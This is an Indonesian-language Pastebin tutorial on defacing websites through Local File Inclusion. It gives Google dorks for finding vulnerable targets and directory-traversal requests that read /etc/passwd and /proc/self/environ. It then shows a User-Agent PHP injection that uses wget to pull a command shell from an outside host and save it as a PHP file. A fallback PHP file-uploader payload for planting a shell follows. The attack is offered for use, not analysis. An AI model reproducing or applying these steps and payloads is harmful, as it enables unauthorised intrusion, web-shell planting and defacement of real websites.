API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 26th, 2019
429
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.12 KB | None | 0 0
raw download clone embed print report
  1. Tutorial LFI – Cara Deface Website dengan Teknik Local File Inclusion. Sebenernya ini exploit lama banget. Malah bisa dibilang basic kalo kalian pengen belajar pentest web. Setara sama SQLi lah . Tapi post aja biar isi blog nya lengkap, sebagai arsip pribadi juga hehe.
  2. Langsung saja, disini yang dibutuhkan cuma Browser Mozilla dengan addons tamper data.
  3.  
  4. Google Dorks :
  5.  
  6. inurl:/view/lang/index.php?page=?page=
  7. inurl:/shared/help.php?page=
  8. Use your brain , b1tch !
  9. Saya anggep sudah dapat site vuln nya.
  10. Pertama, test basic apa web tersebut vuln LFI.
  11.  
  12. localhost/view.php?page=email.php
  13. Coba ganti email.php dengan ../../
  14.  
  15. localhost/view.php?page=../../
  16. Jika kalian dapat error seperti
  17.  
  18. Warning: include(../../) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337
  19. Viola ! 😀 Ada kesempatan untuk membuka localfile yang lebih sensitif 😀
  20. Kita coba panggil file /etc/passwd nya .
  21.  
  22. localhost/view.php?page=etc/passwd
  23. Masih error ?
  24.  
  25. Warning: include(etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337
  26. Kita coba naikkan direktori nya.
  27.  
  28. localhost/view.php?page=../../../../../etc/passwd
  29. Kalau masih error, naikkan terus direktori nya sampai file /etc/passwd nya kebaca.
  30.  
  31. root:x:0:0:root:/root:/bin/bash
  32. bin:x:1:1:bin:/bin:/sbin/nologin
  33. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  34. adm:x:3:4:adm:/var/adm:/sbin/nologin
  35. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  36. sync:x:5:0:sync:/sbin:/bin/sync
  37. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  38. halt:x:7:0:halt:/sbin:/sbin/halt
  39. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  40. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  41. operator:x:11:0:operator:/root:/sbin/nologin
  42. games:x:12:100:games:/usr/games:/sbin/nologin
  43. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  44. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  45. nobody:x:99:99:Nobody:/:/sbin/nologin
  46. dbus:x:81:81:System message bus:/:/sbin/nologin
  47. …. dsb :p
  48.  
  49. Sekarang kita coba panggil apakah proc/self/environ bisa diakses atau tidak. Karena disinilah proses inject backdoor akan dimulai.
  50.  
  51. localhost/view.php?page=../../../../../proc/self/environ
  52. DOCUMENT_ROOT=/home/hackers/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
  53. application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
  54. image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t13371b341231b94r1844ac2ad7ac
  55. HTTP_HOST=localhost HTTP_REFERER=http://localhost/view.php?page=../../../../../etc/passwd
  56. HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2015102815 Ubuntu/9.04 (trusty) Firefox/5.0.15
  57. PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
  58. REDIRECT_STATUS=200 REMOTE_ADDR=127.0.0.1 REMOTE_PORT=1337
  59. REQUEST_METHOD= GET REQUEST_URI = /view.php?page=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
  60. SCRIPT_FILENAME=/home/hackers/public_html/view.php SCRIPT_NAME=/view.php
  61. SERVER_ADDR=1xx.1xx.1xx.6x [email protected] SERVER_NAME=localhost
  62. SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
  63. Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
  64. PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at localhost Port 80
  65. Berarti web tersebut bisa diinject. Kalau blank, berarti tidak bisa.
  66. Langkah selanjutnya, aktifkan tamper data.
  67. Load halaman localhost/view.php?page=../../../../../proc/self/environ
  68. Lalu tamper.
  69. pada user-agent di addons tamper data tadi isi dengan
  70.  
  71. <?system(‘wget http://yuyudhn1337.org/exp/cmdshell.txt -O fvck.php’);?>
  72. Lalu submit.
  73.  
  74. Shell kalian akan terletak di
  75.  
  76. localhost/fvck.php
  77. Pada beberapa kasus, fungsi system di server dimatikan sehingga kita tidak bisa melakukan wget melalui cara diatas.
  78. Tapi ada cara lain.
  79. Pad user-agent masukkan script uploader berikut :
  80.  
  81. <?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p>
  82. <h1> shu </h1></p>
  83. <br> <form action="" method="post" enctype="multipart/form-data">
  84. Filename: <input type="file" name="file" /><input type="submit" value="Submit" /><br>
  85. Setelah diupload, maka shell akan terletak di root path domain.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!